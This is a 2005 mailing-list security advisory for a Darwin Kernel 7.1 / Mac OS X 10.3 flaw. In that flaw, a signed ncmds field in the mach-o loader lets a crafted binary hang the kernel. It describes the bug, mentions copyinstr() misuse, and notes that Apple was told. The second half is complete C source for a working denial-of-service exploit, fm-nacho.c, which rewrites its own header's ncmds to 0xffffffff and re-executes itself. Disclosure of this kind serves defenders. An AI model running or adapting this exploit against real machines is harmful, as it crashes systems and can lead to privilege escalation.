Darwin Kernel Vulnerability

[nemo () felinemenace org]

"moderator: resending this mail since it appears to of got dropped, if not, please ignore this message.

                     _,'|             _.-''``-...___..--';)
                     /_ \'.      __..-' ,      ,--...--'''
                    <\    .`--'''       `     /'
                    `-';'               ;   ; ;
               __...--''     ___...--_..'  .;.'
           fL (,__....----'''       (,..--''  felinemenace.org

Program:        Darwin Kernel 7.1
Impact:         DoS, Possible local privilege escalation.       
Discovered:     8th January 2005 by nemo -( nemo @ felinemenace.org )-
Writeup and exploits:

1) Background

Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3
Some of the bugs we investigated exist due to lack of input validation in the mach-o 
loader.

2) Description

In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the most part
each field is trusted to be acceptable.

In the mach-o loader code (parse_machfile()) ncmds and offset are both declared as 
signed integers, however the appropriate structs used to read from the file are 
unsigned.
After a little investigation a DoS was quickly written to set ncmds to -1. 

        ncmds = header->ncmds; 
                        while (ncmds--) {

The attached code will cause a denial of service on MacOSX <= 10.3.7

3) Notes
During our audit of the Darwin Kernel many bugs stood out, however we have not 
had time to follow through on most of them. Something that caught our attention 
was the misuse of the copyinstr() command. This function will not force a NULL
character to be appended to the string copied in, however it seems in many cases
the size passed to the function doesn't take this into account.
Unfortunately, as security goes, its all about who posts first. 
http://www.immunitysec.com/downloads/nukido.pdf

4) Vendor status/notes/fixes/statements
Apple have been notified about this bug.

5) Exploit

//---------------------( fm-nacho.c )--------------------------
/*
 * DoS for Darwin Kernel Version < 7.5.0
 * -(nemo () pulltheplug org)-
 * 2005
 *
 * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
 * irc.pulltheplug.org (#social)
 */

#include <stdio.h>

int main(int ac, char **av)
{
        FILE *me;
        int rpl = 0xffffffff;
        fpos_t pos = 0x10;
        printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
        printf("-( nemo () pulltheplug org )-\n\n");
        printf("[+] Opening file for writing.\n");
        if(!(me = fopen(*av,"r+"))) {
                printf("[-] Error opening exe.\n");
                exit(1);
        }
        printf("[+] Seeking to ncmds.\n");
        if((fsetpos(me,&pos)) == -1) {
                printf("[-] Error seeking to ncmds.\n");
                exit(1);
        }
        printf("[+] Changing ncmds to 0x%x.\n",rpl);
        if(fwrite(&rpl,4,1,me) < 1) {
                printf("[-] Error writing to file.\n");
                exit(1);
        }
        fclose(me);
        printf("[+] Re-executing with modified mach-o header.\n");
        sleep(5);
        if(execv(*av,av) == -1 ) {
                printf("[-] Error executing %s, please run manually.\n",*av);
                exit(1);
        }
        exit(0); // hrm
}